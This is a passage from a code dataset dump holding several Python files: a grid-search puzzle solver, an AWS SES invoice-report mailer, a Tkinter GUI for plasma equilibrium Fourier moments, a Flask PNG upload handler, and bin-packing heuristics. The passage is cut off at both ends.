(%s,%s)\"%(dx,dy))\n while ratio < RATIO_THR:\n x = x + dx\n y = y + dy\n dx, dy = dx * 1.2, dy * 1.20\n # DEBUG (\"3 (%s,%s)\"%(x,y))\n xi, yi = int(x + 0.5), int(y + 0.5)\n p2 = Pos(xi, yi)\n p3 = symm(p0, p2)\n if p3 in _done:\n # DEBUG (\"NOK: %s skip done\"%p3)\n continue\n _done.append(p3)\n if not square.isInside(p3):\n # DEBUG (\"NOK:%s out\"%p3)\n break\n l2 = Line(p2, p0)\n mediane = l2.ortho(p2)\n a2 = area.copy()\n try:\n a2.addLine(mediane, p0)\n except:\n continue\n a2a = a2.area()\n if a2a == 0: continue\n if a2a + 0.5 > aa:\n DEBUG(\"Stop dir %d:%f\" % (direction * 180 / 3.1415, a2a))\n break\n # a3= area.copy()\n # try:a3.addLine(mediane,p3)\n # except:continue\n # a3a=a3.area()\n if ratio_prec == 0:\n dx, dy = cs * dd, sn * dd\n ratio = aa / (2 * a2a)\n if ratio > 1: ratio = 1 / ratio\n if ratio > max_ratio:\n max_ratio = ratio\n best_pos = p3\n DEBUG(\"Placing at %s => r=%d%%\" % (p3, ratio * 100))\n DEBUG(\"dx,dy=%s %s\" % (dx, dy))\n # else: DEBUG (\"NOK:Placing at %s => r=%d%%\"%(p3,ratio * 100))\n if ratio_prec > ratio:\n DEBUG(\"Stopping at %s => r=%d%%\" % (p3, ratio * 100))\n break\n ratio_prec = ratio\n bestPoint = best_pos\n DEBUG(\"Placing at %s => r=%0.2f%%\" % (best_pos, max_ratio * 100))\n\n if not bestPoint or max_ratio < 0.5:\n l = Line(curPos, pCenter).ortho(pCenter)\n p = area.intersect(l)[0]\n bestPoint = p\n except Exception as e:\n DEBUG(\"Exception\")\n raise e\n else:\n bestPoint = area.aPointFarFrom(curPos).middle(pCenter)\n\n if possible:\n # WHICH possible point is closer to bestPoint?\n dMin = w + h\n pMin = None\n for p in possible:\n d = p.dist(bestPoint)\n if d < dMin:\n DEBUG(\"CLOSER point %s:%f\" % (p, d))\n dMin = d\n pMin = p\n DEBUG(\"found closest point to %s: %s\" % (bestPoint, pMin))\n if pMin: bestPoint = pMin\n bestPoint.force_inside()\n\n DEBUG(\"BestPoint is %s\" % bestPoint)\n prev_pos = curPos\n curPos = bestPoint\n\n done.append(bestPoint)\n if possible and bestPoint in possible: possible.remove(bestPoint)\n print(bestPoint.intStr())","sub_path":"ShadowOfNight/Episode 2/Other coders/shadowNight_masterglob_Lvl27.py","file_name":"shadowNight_masterglob_Lvl27.py","file_ext":"py","file_size_in_byte":19834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"71342997","text":"import os\nfrom boto3.session import Session\nfrom datetime import datetime\nfrom email.mime.text import MIMEText\nfrom email.mime.application import MIMEApplication\nfrom email.mime.multipart import MIMEMultipart\n\n\nclass Email():\n def __init__(self):\n self.client = Session(# IAM User bumbol-api\n aws_access_key_id=os.environ['ses_key'],\n aws_secret_access_key=os.environ['ses_secret'],\n region_name=\"us-west-2\").client('ses')\n now = datetime.utcnow()\n self.datetimestr = now.strftime('%m/%d/%Y')\n \n \n def send_single_report(self, info):\n print(\"send_single_report()\")\n self.load_single_template(info)\n response = self.send_with_attachments(info)\n return response\n \n def send_with_attachments(self, info):\n now = datetime.utcnow()\n datestr = now.strftime('%Y-%m-%d')\n print(\"send_with_attachments\")\n filename = \"Invoice-{}-{}.pdf\".format(info[\"invoice_number\"], datestr)\n msg = MIMEMultipart('alternative')\n msg['Subject'] = 'Report for Invoice #{}'.format(info[\"invoice_number\"])\n msg['From'] = 'Bumbol Reports '\n msg['To'] = '{} {} <{}>'.format(info['f_name'], info['l_name'], info['to'])\n msg.preamble = 'Multipart message.\\n'\n # Text Part\n part = MIMEText(self.text_body, 'plain')\n msg.attach(part)\n # HTML\n part = MIMEText(self.html_body, 'html')\n msg.attach(part)\n # Report\n part = MIMEApplication(open(info[\"report_file\"], 'rb').read())\n part.add_header('Content-Disposition', 'attachment', filename=filename)\n msg.attach(part)\n # Send Email\n response = self.client.send_raw_email(\n RawMessage={\n 'Data': msg.as_string()\n },\n Source=msg['From'],\n Destinations=[msg['To']]\n )\n return response\n \n \n def send(self):\n response = self.client.send_email(\n Source='reports@bumbol.com',\n Destination={\n 'ToAddresses': [\n self.to,\n ]\n },\n Message={\n 'Subject': {\n 'Data': 'Invoice Report',\n 'Charset': 'UTF-8'\n },\n 'Body': {\n 'Text': {\n 'Data': self.text_body,\n 'Charset': 'UTF-8'\n },\n 'Html': {\n 'Data': self.html_body,\n 'Charset': 'UTF-8'\n }\n }\n },\n ReplyToAddresses=[\n 'support@bumbol.com'\n ],\n ReturnPath='support@bumbol.com'\n )\n return response\n \n \n # Load Template\n def load_single_template(self, info):\n # Open html template file\n filein = open('SingleReportEmailTemplate.html')\n # read it\n src = filein.read()\n # format\n d = {\"f_name\": info[\"f_name\"], \"l_name\": info[\"l_name\"], \"invoice_number\": info[\"invoice_number\"], \"company_name\": info[\"company_name\"], \"date\": self.datetimestr}\n self.html_body = src.format(**d)\n # Text version\n self.text_body = \"Invoice Report \\r\\n \\r\\n\"\\\n \"Hello {f_name}, \\r\\n\"\\\n \"Your requested report is attached to this email. If you did not request a report please verify the sender before opening. \\r\\n \\r\\n\"\\\n \"Requested by {f_name} {l_name} on {date} \\r\\n\"\\\n \"Company: {company_name} \\r\\n\"\\\n \"Invoice: #{invoice_number} \\r\\n \\r\\n\"\\\n \"Bumbol never sends .zip or .exe files. \\r\\n \\r\\n \\r\\n\"\\\n \"This email was sent from a notification-only address that cannot accept incoming email. Please do not reply to this message. \\r\\n\"\\\n \"Please contact support@bumbol.com with any technical issues. \".format(**d)\n \n # Load Template\n def load_multi_template(self):\n # Open template file\n filein = open('ReportEmailTemplate.html')\n # read it\n src = filein.read()\n # format\n heading = \"Invoice Report\"\n d = {'heading':heading, 'details':None }\n self.html_body = src.format(**d)\n ","sub_path":"invoice_reports_service/EmailClass.py","file_name":"EmailClass.py","file_ext":"py","file_size_in_byte":4426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"157635830","text":"import os, sys\nsys.path.append('/afs/ipp/home/g/git/python/repository')\ntry:\n import Tkinter as tk\n import ttk\nexcept:\n import tkinter as tk\n from tkinter import ttk\nimport numpy as np\nimport ufiles, nemec, mom2rz\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg\nfrom matplotlib.figure import Figure\nfrom matplotlib.widgets import Slider\nimport map_equ_20180130\nfrom tooltip import createToolTip\nfrom multiprocessing import Pool, cpu_count\n\neqm = map_equ_20180130.equ_map()\n\nmomtyp = ('R cos', 'R sin', 'z cos', 'z sin')\n\nclass GEO_NEMEC:\n\n\n timeout = 1e-10\n\n\n def __init__(self, nshot, fmframe=None):\n\n if fmframe is None:\n if __name__ == '__main__':\n fmframe = tk.Tk()\n import trgui_style\n else:\n fmframe = tk.Toplevel()\n\n fmframe.geometry('1300x950')\n\n# Widgets style\n\n\n# Menu bar\n\n menubar = tk.Menu(fmframe)\n filemenu = tk.Menu(menubar, tearoff=0)\n filemenu.add_command(label=\"Run NEMEC\", command=self.surf)\n filemenu.add_command(label=\"Store u-files\", command=self.store_u)\n filemenu.add_separator()\n filemenu.add_command(label=\"Close\", command=fmframe.destroy)\n menubar.add_cascade(label = \"File\", menu=filemenu)\n fmframe.config(menu = menubar)\n\n canvframe = ttk.Frame(fmframe, height=850)\n entframe = ttk.Frame(fmframe)\n self.toolframe = ttk.Frame(fmframe)\n for frame in canvframe, entframe, self.toolframe:\n frame.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n self.nbplot = ttk.Notebook(canvframe)\n self.nbplot.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n self.nbplot.bind('', self.on_click)\n\n pol_frame = ttk.Frame(self.nbplot)\n mom_frame = ttk.Frame(self.nbplot)\n profframe = ttk.Frame(self.nbplot)\n self.nbplot.add(pol_frame, text='Poloidal plot')\n self.nbplot.add(mom_frame, text='Fourier moments')\n self.nbplot.add(profframe, text='EQuilibrium profiles')\n\n self.proffig = Figure(figsize=(4., 8.), dpi=100)\n self.pol_fig = Figure(figsize=(6., 8.), dpi=100)\n self.mom_fig = Figure(figsize=(6., 8.), dpi=100)\n\n self.proffig.subplots_adjust(left=0.2, bottom=0.1, right=0.8 , top=0.9)\n self.pol_fig.subplots_adjust(left=0.06, bottom=0.1, right=0.98, top=0.9)\n self.mom_fig.subplots_adjust(left=0.08, bottom=0.1, right=0.98, top=0.9)\n\n self.profcanvas = FigureCanvasTkAgg(self.proffig, master=profframe)\n self.pol_canvas = FigureCanvasTkAgg(self.pol_fig, master=pol_frame)\n self.mom_canvas = FigureCanvasTkAgg(self.mom_fig, master=mom_frame)\n\n self.profcanvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n self.pol_canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n self.mom_canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n#-----------------\n# Initialise plots\n#-----------------\n\n self.pol_fig.text(.5, .99, r'NEMEC equilibrium, constant $\\rho$ and constant $\\theta$ contours', \\\n ha='center', va='top')\n self.mom_fig.text(.5, .99, 'NEMEC Fourier moments', ha='center', va='top')\n\n# Profiles\n\n fsize = 16\n\n self.qsub = self.proffig.add_subplot(311)\n self.qsub.set_xlim(0,1)\n self.qsub.set_xlabel(r'$\\rho_{tor}$',fontsize=fsize)\n self.qsub.set_ylabel('q profile')\n\n self.psub = self.proffig.add_subplot(312)\n self.psub.set_xlim((0, 1))\n self.psub.set_xlabel(r'$\\rho_{tor}$',fontsize=fsize)\n self.psub.set_ylabel('Pressure [Pa]')\n\n self.rbsub = self.proffig.add_subplot(313)\n self.rbsub.set_xlim(0,1)\n self.rbsub.set_xlabel(r'$\\rho_{tor}$',fontsize=fsize)\n self.rbsub.set_ylabel('R*B$_\\phi$')\n\n#---------------\n# Player buttons\n\n locdir = os.path.dirname(os.path.realpath(__file__))\n self.playfig = tk.PhotoImage(file='%s/play.gif' %locdir)\n self.pausefig = tk.PhotoImage(file='%s/pause.gif' %locdir)\n self.forwardfig = tk.PhotoImage(file='%s/forward.gif' %locdir)\n self.backwardfig = tk.PhotoImage(file='%s/backward.gif' %locdir)\n\n backward_button = ttk.Button(self.toolframe, command=self.Backward,image=self.backwardfig)\n self.play_button = ttk.Button(self.toolframe, command=self.Play, image=self.playfig)\n forward_button = ttk.Button(self.toolframe, command=self.Forward, image=self.forwardfig)\n\n createToolTip(forward_button , 'Go to next timestep')\n createToolTip(backward_button , 'Go backward by one timestep')\n createToolTip(self.play_button, 'Forward animation/pause')\n\n for but in backward_button, self.play_button, forward_button:\n but.pack(side=tk.LEFT)\n\n# Entry frame\n geoinit = {'shot': nshot, 'Nmom': 7, 'ntheta': 101, 'nrho': 81, \\\n 'exp': 'AUGD', 'dia': 'EQH', 'ed': 0, \\\n 'tbeg': 4, 'tend': 6., 'DeltaT': 0.1}\n\n self.geodict = {}\n\n for key in ('shot', 'tbeg', 'tend', 'DeltaT', \\\n 'exp', 'dia', 'ed', \\\n 'Nmom', 'ntheta', 'nrho'):\n raw = ttk.Frame(entframe)\n raw.pack(side=tk.TOP)\n lbl = ttk.Label(entframe, text=key, width=5).pack(side=tk.LEFT)\n var = ttk.Entry(entframe, width=5)\n var.insert(0, geoinit[key])\n var.pack(side=tk.LEFT, padx='2 7')\n self.geodict[key] = var\n\n self.psep = self.pol_fig.add_subplot(111, aspect='equal')\n self.psep.set_xlim((0.8, 3.0))\n self.psep.set_ylim((-1.4, 1.4))\n self.psep.set_xlabel('R [m]')\n self.psep.set_ylabel('z [m]')\n\n nshot_in = int(geoinit['shot'])\n gc_r, gc_z = map_equ_20180130.get_gc(nshot_in)\n for key in gc_r.keys():\n self.psep.plot(gc_r[key], gc_z[key], 'b-')\n\n toolbar = NavigationToolbar2TkAgg(self.pol_canvas, pol_frame)\n toolbar.update()\n toolbar = NavigationToolbar2TkAgg(self.mom_canvas, mom_frame)\n toolbar.update()\n toolbar = NavigationToolbar2TkAgg(self.profcanvas, profframe)\n toolbar.update()\n\n if __name__ == '__main__':\n fmframe.mainloop()\n\n\n def surf(self):\n\n self.nshot = int(self.geodict['shot'].get())\n dianam = self.geodict['dia'].get().strip()\n expnam = self.geodict['exp'].get().strip()\n ed = int(self.geodict['ed'].get().strip())\n delta_t = float(self.geodict['DeltaT'].get().strip())\n\n# Parameters for kk\n\n npfm = 1001\n mpfm = 1001\n\n nrzmax = 1000\n mom_type = len(momtyp)\n self.mom_order = int(self.geodict['Nmom'].get().strip())\n n_the_u = int(self.geodict['ntheta'].get().strip())\n n_rho_u = int(self.geodict['nrho'].get().strip())\n\n tbeg = float(self.geodict['tbeg'].get().strip())\n tend = float(self.geodict['tend'].get().strip())\n\n#==============\n# kk-time grid\n#==============\n\n if eqm.Open(self.nshot, diag=dianam, exp=expnam, ed=ed):\n eqm._read_profiles()\n\n ind_ok = []\n\n tim_old = -np.infty\n# Allow delta_t\n for jt, tim in enumerate(eqm.t_eq):\n if (tim >= tbeg) and (tim <= tend) and (tim > tim_old + delta_t):\n ind_ok.append(jt)\n tim_old = tim\n\n self.tarr = eqm.t_eq[ind_ok]\n self.nt = len(self.tarr)\n self.rho_u = np.linspace(0, 1, n_rho_u)\n\n self.q_u = np.zeros((n_rho_u, self.nt))\n self.pres_u = np.zeros((n_rho_u, self.nt))\n self.rbphi_u = np.zeros((n_rho_u, self.nt))\n\n vmec_dic = { 'nshot':self.nshot, 'mdescur':self.mom_order, \\\n 'exp':expnam, 'dia':dianam, 'ed':ed, \\\n 'nrho_nem': 101, 'nthe_nem': 60}\n\n self.rsurf = np.zeros((self.nt, n_rho_u, n_the_u))\n self.zsurf = np.zeros((self.nt, n_rho_u, n_the_u))\n\n#===========\n# Time loop\n#===========\n\n tf = eqm.tf[ ::-1, ind_ok]\n q = - eqm.q[ ::-1, ind_ok]\n pres = eqm.pres[ ::-1, ind_ok]\n ffs = - 2e-7*eqm.jpol[::-1, ind_ok]\n\n q[-1, :] = 2.*q[-2, :] - q[-3, :]\n\n nmod = self.mom_order\n n_mom = nmod*mom_type\n\n self.mom_u = np.zeros((self.nt, n_rho_u, n_mom))\n self.rc = np.zeros((self.nt, n_rho_u, nmod))\n self.rs = np.zeros((self.nt, n_rho_u, nmod))\n self.zc = np.zeros((self.nt, n_rho_u, nmod))\n self.zs = np.zeros((self.nt, n_rho_u, nmod))\n\n for jt in range(self.nt):\n\n rhot = np.sqrt((tf[:, jt] - tf[0, jt])/(tf[-1, jt] - tf[0, jt]))\n\n# Profiles: q, pressure, R*Bphi\n self.q_u[:, jt] = np.interp(self.rho_u, rhot, q[:, jt])\n self.pres_u[:, jt] = np.interp(self.rho_u, rhot, pres[:, jt])\n self.rbphi_u[:, jt] = np.interp(self.rho_u, rhot, ffs[:, jt])\n\n# NEMEC for magnetic moments\n\n pool = Pool(cpu_count())\n out = pool.map(nemec.nemec, [(vmec_dic, self.tarr[jt], '%d' %jt) for jt in range(self.nt)])\n pool.close()\n pool.join()\n\n for jt in range(self.nt):\n rho_nem = out[jt][4]\n for jord in range(nmod):\n# rho_nem is a grid equispaced in tor. flux, not in rho_tor\n self.rc[jt, :, jord] = np.interp(self.rho_u, rho_nem, out[jt][0][:, jord])\n self.rs[jt, :, jord] = np.interp(self.rho_u, rho_nem, out[jt][1][:, jord])\n self.zc[jt, :, jord] = np.interp(self.rho_u, rho_nem, out[jt][2][:, jord])\n self.zs[jt, :, jord] = np.interp(self.rho_u, rho_nem, out[jt][3][:, jord])\n\n for jord in range(nmod):\n fac = 1./(self.rho_u[1:]**jord)\n self.mom_u[..., 1:, jord] = fac[:]*self.rc[..., 1:, jord]\n self.mom_u[..., 1:, jord + nmod] = fac[:]*self.rs[..., 1:, jord]\n self.mom_u[..., 1:, jord + 2*nmod] = fac[:]*self.zc[..., 1:, jord]\n self.mom_u[..., 1:, jord + 3*nmod] = fac[:]*self.zs[..., 1:, jord]\n self.mom_u[..., 0, jord] = self.rc[..., 0, jord]\n self.mom_u[..., 0, jord + nmod] = 0.\n self.mom_u[..., 0, jord + 2*nmod] = self.zc[..., 0, jord]\n self.mom_u[..., 0, jord + 3*nmod] = 0.\n\n self.mom_u *= 100.\n\n self.rsurf, self.zsurf = mom2rz.mom2rz( self.rc, self.rs, \\\n self.zc, self.zs, nthe=n_the_u)\n\n# End of time loop\n self.begin()\n\n\n def store_u(self):\n\n tlbl = 'Time'.ljust(20) + 'Seconds'\n mlbl = 'MOMENT INDEX'\n dlbl = 'FOURIER MOMENTS'.ljust(20) + 'CM'\n rholbl = 'RHO_TOR'\n thlbl = 'THETA'.ljust(20) + 'RAD'\n rlbl = 'MAJOR RADIUS'.ljust(20) + 'M'\n zlbl = 'VERTICAL POSITION'.ljust(20) + 'M'\n\n n_the_u = self.rsurf.shape[2]\n theta = np.linspace(0, 2*np.pi, n_the_u)\n\n # NUBEAM R,z=f(t,rho,theta)\n\n uf_d = { 'pre': 'R', 'ext': 'SURF', 'shot': self.nshot, \\\n 'grid': {'X': {'lbl': tlbl , 'arr': self.tarr}, \\\n 'Y': {'lbl': rholbl, 'arr': self.rho_u}, \\\n 'Z': {'lbl': thlbl , 'arr': theta} }, \\\n 'data': {'lbl': rlbl, 'arr': self.rsurf} }\n ufiles.WU(uf_d)\n\n uf_d = { 'pre': 'Z', 'ext': 'SURF', 'shot': self.nshot, \\\n 'grid': {'X': {'lbl': tlbl , 'arr': self.tarr}, \\\n 'Y': {'lbl': rholbl, 'arr': self.rho_u}, \\\n 'Z': {'lbl': thlbl , 'arr': theta} }, \\\n 'data': {'lbl': zlbl, 'arr': self.zsurf} }\n ufiles.WU(uf_d)\n\n# q profile\n\n qlbl = 'Q'\n uf_d = { 'pre': 'Q', 'ext': 'EQ', 'shot': self.nshot, \\\n 'grid': {'X': {'lbl': tlbl , 'arr': self.tarr}, \\\n 'Y': {'lbl': rholbl, 'arr': self.rho_u} }, \\\n 'data': {'lbl': qlbl, 'arr': self.q_u} }\n ufiles.WU(uf_d)\n\n# Pressure profile\n\n plbl = 'P'.ljust(20) + '[Pa]'\n uf_d={ 'pre': 'P', 'ext': 'EQ', 'shot': self.nshot, \\\n 'grid': {'X': {'lbl': tlbl , 'arr': self.tarr}, \\\n 'Y': {'lbl': rholbl, 'arr': self.rho_u} }, \\\n 'data': {'lbl': plbl, 'arr': self.pres_u} }\n ufiles.WU(uf_d)\n\n# R*Bphi\n\n rblbl = 'R*Bphi'.ljust(20) + '[T*m]'\n uf_d={ 'pre': 'F', 'ext': 'EQ', 'shot': self.nshot, \\\n 'grid': {'X': {'lbl': tlbl , 'arr': self.tarr}, \\\n 'Y': {'lbl': rholbl, 'arr': self.rho_u} },\n 'data': {'lbl': rblbl, 'arr': self.rbphi_u} }\n ufiles.WU(uf_d)\n\n# Fourier moments\n\n n_mom = self.mom_u.shape[-1]\n marr = 1 + np.arange(n_mom)\n\n uf_d={ 'pre': 'M', 'ext': 'MMX', 'shot': self.nshot, \\\n 'grid': {'X': {'lbl': tlbl , 'arr': self.tarr}, \\\n 'Y': {'lbl': rholbl, 'arr': self.rho_u}, \\\n 'Z': {'lbl': mlbl , 'arr': marr} }, \\\n 'data': {'lbl': dlbl, 'arr': self.mom_u} }\n ufiles.WU(uf_d)\n\n\n#------------\n# Animation\n#------------\n\n def on_click(self, event):\n if event.widget.identify(event.x, event.y) == 'label':\n self.jtab = event.widget.index('@%d,%d' % (event.x, event.y))\n self.update_plot()\n\n def begin(self):\n self.stop = True\n self.jtab = 0\n self.jt = 0\n self.set_plots()\n\n def Pause(self):\n self.stop = True\n self.play_button['image'] = self.playfig\n self.play_button['command'] = self.Play\n\n def Forward(self):\n self.stop = True\n self.play_button['image'] = self.playfig\n self.play_button['command'] = self.Play\n self.jt += 1\n self.jt = self.jt%self.nt\n self.update_plot()\n\n def Backward(self):\n self.stop = True\n self.play_button['image'] = self.playfig\n self.play_button['command'] = self.Play\n self.jt -= 1\n self.jt = self.jt%self.nt\n self.update_plot()\n\n def Play(self):\n self.stop = False\n self.play_button['image'] = self.pausefig\n self.play_button['command'] = self.Pause\n while self.jt < self.nt-1 and not self.stop:\n self.jt += 1\n self.update_plot()\n self.pol_canvas.start_event_loop(self.timeout)\n\n\n def set_plots(self):\n\n# Scale bar\n\n self.crntsc = tk.Scale(self.toolframe, command=self.jump, \\\n orient=tk.HORIZONTAL, length=300)\n self.crntsc.pack(side=tk.LEFT)\n\n# Poloidal plot\n\n self.tim0 = self.pol_fig.text(.5, .96, '', ha='center', va='top')\n\n self.scat = self.pol_fig.add_subplot(111, aspect='equal')\n self.scat.set_xlim((0.8, 3.0))\n self.scat.set_ylim((-1.4, 1.4))\n self.scat.set_xlabel('R [m]')\n self.scat.set_ylabel('z [m]')\n gc_r, gc_z = map_equ_20180130.get_gc()\n for key in gc_r.keys():\n self.scat.plot(gc_r[key], gc_z[key], 'b-')\n\n self.rhoplot = {}\n self.theplot = {}\n self.theplot2 = {}\n nt, n_rho_u, n_the_u = self.rsurf.shape\n for jrho in range(n_rho_u):\n self.theplot[jrho], = self.scat.plot([], [], 'g-')\n self.theplot2[jrho], = self.scat.plot([], [], 'g-')\n for jthe in range(n_the_u):\n self.rhoplot[jthe], = self.scat.plot([], [], 'r-')\n\n# Moments\n\n self.tim1 = self.mom_fig.text(.5, .96, '', ha='center', va='top')\n mom_type = len(momtyp)\n\n ncols = self.mom_order\n nrows = mom_type\n\n self.rcp = {}\n self.rsp = {}\n self.zcp = {}\n self.zsp = {}\n\n for jm in range(self.mom_order):\n jplot = jm + 1\n xtext = 0.1 + (float(jm)*0.94)/float(self.mom_order)\n self.mom_fig.text(xtext, 0.93, '%dth moment' %jm, ha='center', va='top')\n\n momp = self.mom_fig.add_subplot(nrows, ncols, jplot)\n momp.set_xlabel(r'$\\rho_{tor}$')\n\n self.rcp[jm], = momp.plot(self.rho_u, self.rc[0, :, jm])\n if jm == 0:\n momp.set_ylabel('R cos')\n\n momp = self.mom_fig.add_subplot(nrows, ncols, jplot + self.mom_order)\n self.rsp[jm], = momp.plot(self.rho_u, self.rs[0, :, jm])\n if jm == 0:\n momp.set_ylabel('R sin')\n\n momp = self.mom_fig.add_subplot(nrows, ncols, jplot + 2*self.mom_order)\n self.zcp[jm], = momp.plot(self.rho_u, self.zc[0, :, jm])\n if jm == 0:\n momp.set_ylabel('z cos')\n\n momp = self.mom_fig.add_subplot(nrows, ncols, jplot + 3*self.mom_order)\n self.zsp[jm], = momp.plot(self.rho_u, self.zs[0, :, jm])\n if jm == 0:\n momp.set_ylabel('z sin')\n \n# Profiles\n\n self.tim2 = self.proffig.text(.5, .97, '', ha='center', va='top')\n self.qplot, = self.qsub.plot( self.rho_u, self.q_u[:, 0])\n self.pplot, = self.psub.plot( self.rho_u, self.pres_u[:, 0])\n self.rbplot, = self.rbsub.plot(self.rho_u, self.rbphi_u[:, 0])\n\n# Update\n\n self.update_plot()\n\n\n def jump(self, arg):\n\n self.jt = int(float(arg)/100. * (self.nt-1))\n self.update_plot(reset=False)\n\n\n def update_plot(self, reset=True):\n\n if reset:\n self.crntsc.set(float(self.jt)/(self.nt - 1)*100.)\n# return\n tstr = '# %d, Time:%6.3f s' %(self.nshot, self.tarr[self.jt])\n\n if self.jtab == 0: # Poloidal\n nt, n_rho_u, n_the_u = self.rsurf.shape\n for jrho in range(n_rho_u):\n self.theplot[jrho].set_data(self.rsurf[self.jt, jrho, :], self.zsurf[self.jt, jrho, :])\n self.theplot2[jrho].set_data(self.rsurf[self.jt, jrho, [-1, 0]], self.zsurf[self.jt, jrho, [-1, 0]])\n for jthe in range(n_the_u):\n self.rhoplot[jthe].set_data(self.rsurf[self.jt, :, jthe], self.zsurf[self.jt, :, jthe])\n self.tim0.set_text(tstr)\n self.pol_canvas.draw()\n\n elif self.jtab == 1: # Moments\n\n for jm in range(self.mom_order):\n self.rcp[jm].set_ydata(self.rc[self.jt][:, jm])\n self.rsp[jm].set_ydata(self.rs[self.jt][:, jm])\n self.zcp[jm].set_ydata(self.zc[self.jt][:, jm])\n self.zsp[jm].set_ydata(self.zs[self.jt][:, jm])\n self.tim1.set_text(tstr)\n self.mom_canvas.draw()\n\n elif self.jtab == 2: # Profiles\n self.qsub.set_ylim((0, 1.1*np.max(self.q_u[:, self.jt])))\n self.qplot.set_ydata(self.q_u[:, self.jt])\n\n self.psub.set_ylim((0, 1.1*np.max(self.pres_u[:, self.jt])))\n self.pplot.set_ydata(self.pres_u[:, self.jt])\n\n self.rbsub.set_ylim((0, 1.1*np.max(self.rbphi_u[:, self.jt])))\n self.rbplot.set_ydata(self.rbphi_u[:, self.jt])\n\n self.tim2.set_text(tstr)\n self.profcanvas.draw()\n\n\n\nif __name__ == \"__main__\":\n\n nshot = 28053\n GEO_NEMEC(nshot)\n","sub_path":"geo_nemec_test.py","file_name":"geo_nemec_test.py","file_ext":"py","file_size_in_byte":19033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"414876004","text":"from flask import request, send_from_directory\nfrom werkzeug import secure_filename\nfrom sleepypuppy import app, csrf_protect\nimport os\nfrom PIL import Image\n\n# Only allow png extensions, which is the filetype we generate using HTML5 canvas.\nALLOWED_EXTENSIONS = set(['png'])\n\ndef allowed_file(filename):\n \"\"\"\n Method to filter out bad filenames and prevent dir traversal.\n \"\"\"\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n@csrf_protect.exempt\n@app.route('/up', methods=['GET', 'POST'])\ndef upload_file():\n \"\"\"\n Store filename by timestamp and resize file for thumbnail.\n \"\"\"\n size = 256, 256\n if request.method == 'POST':\n file = request.files['file']\n if file and allowed_file(file.filename):\n # Prevent dir traversal/NUL byte injection\n filename = secure_filename(file.filename)\n if not os.path.exists(app.config['UPLOAD_FOLDER']):\n os.makedirs(app.config['UPLOAD_FOLDER'])\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n im = Image.open(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n im.thumbnail(size, Image.ANTIALIAS)\n im.save(app.config['UPLOAD_FOLDER'] + '/small_' + filename, \"PNG\")\n return \"\"\n\n@app.route('/up/')\ndef uploaded_file(filename):\n \"\"\"\n Route to retrieve screenshot when requested.\n \"\"\"\n return send_from_directory(app.config['UPLOAD_FOLDER'],\n filename)\n","sub_path":"sleepypuppy/upload/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"41994371","text":"from containerSuit import ContainerSuit as CS\nfrom size import ContainerSize \nimport math\n\nclass AlgorithmsImpl: \n def __init__(self, capacity = 100): \n self.containerCapacity = capacity \n\n def theoreticalContainers(self, cargosSizes):\n return math.ceil(self.getCargosSum(cargosSizes) / self.containerCapacity) \n\n @staticmethod \n def getCargosSum(cargosSizes): \n return sum(cargosSizes) \n\n def NFA(self, sizes, sort = False, reverse = False): # NFA \n if not sort: \n label = 'NFA(unsorted)' \n cargos = self.CargoListFromSizes(sizes) \n else:\n if reverse:\n label = 'NFA(sorted in reverse)'\n else:\n label = 'NFA(sorted)'\n cargos = self.CargoListFromSizes(sizes, sort, reverse) \n containers = CS() \n containers.addNewEmpty() \n for cargo in cargos: \n lastContainer = containers.getLastContainer() \n if lastContainer.FreeSpace() >= cargo.size: \n lastContainer.addCargo(cargo) \n else: \n containers.addNewAndPut(cargo) \n self.printContainersInfo(containers.suit, label) \n\n def FFA(self, sizes, sort = False, reverse = False): # FFA \n if not sort: \n label = 'FFA(unsorted)' \n cargos = self.CargoListFromSizes(sizes) \n else: \n if reverse:\n label = 'FFA(sorted in reverse)'\n else:\n label = 'FFA(sorted)'\n cargos = self.CargoListFromSizes(sizes, sort, reverse) \n containers = CS() \n containers.addNewEmpty() \n iter = 0 \n for cargo in cargos: \n lastContainer = containers.getLastContainer() \n iter += 1 \n if lastContainer.FreeSpace() >= cargo.size: \n lastContainer.addCargo(cargo) \n else: \n answer = containers.getFirstSuitable(cargo) \n if answer: \n firstSuitable = answer['container'] \n iter += answer['iter'] \n firstSuitable.addCargo(cargo) \n else: \n iter += len(containers.suit); \n containers.addNewAndPut(cargo) \n self.printContainersInfo(containers.suit, label) \n print('Number of iterations:', iter) \n\n def WFA(self, sizes, sort = False, reverse = False): # WFA \n if not sort: \n label = 'WFA(unsorted)' \n cargos = self.CargoListFromSizes(sizes) \n else:\n if reverse:\n label = 'WFA(sorted in reverse)'\n else:\n label = 'WFA(sorted)'\n cargos = self.CargoListFromSizes(sizes, sort, reverse) \n containers = CS() \n containers.addNewEmpty() \n iter = 0 \n for cargo in cargos: \n lastContainer = containers.getLastContainer() \n iter += 1 \n if lastContainer.FreeSpace() >= cargo.size: \n lastContainer.addCargo(cargo) \n else: \n tempDict = containers.getMostEmpty() \n mostEmpty = tempDict['container'] \n iter += tempDict['iter'] + 1 \n if mostEmpty.FreeSpace() >= cargo.size: \n mostEmpty.addCargo(cargo) \n else: \n containers.addNewAndPut(cargo) \n self.printContainersInfo(containers.suit, label) \n print('Number of iterations:', iter)\n\n def BFA(self, sizes, sort = False, reverse = False): # BFA \n if not sort: \n label = 'BFA(unsorted)' \n cargos = self.CargoListFromSizes(sizes) \n else: \n if reverse:\n label = 'BFA(sorted)'\n else:\n label = 'BFA(sorted in reverse)'\n cargos = self.CargoListFromSizes(sizes, sort, reverse) \n containers = CS() \n containers.addNewEmpty() \n iter = 0 \n for cargo in cargos: 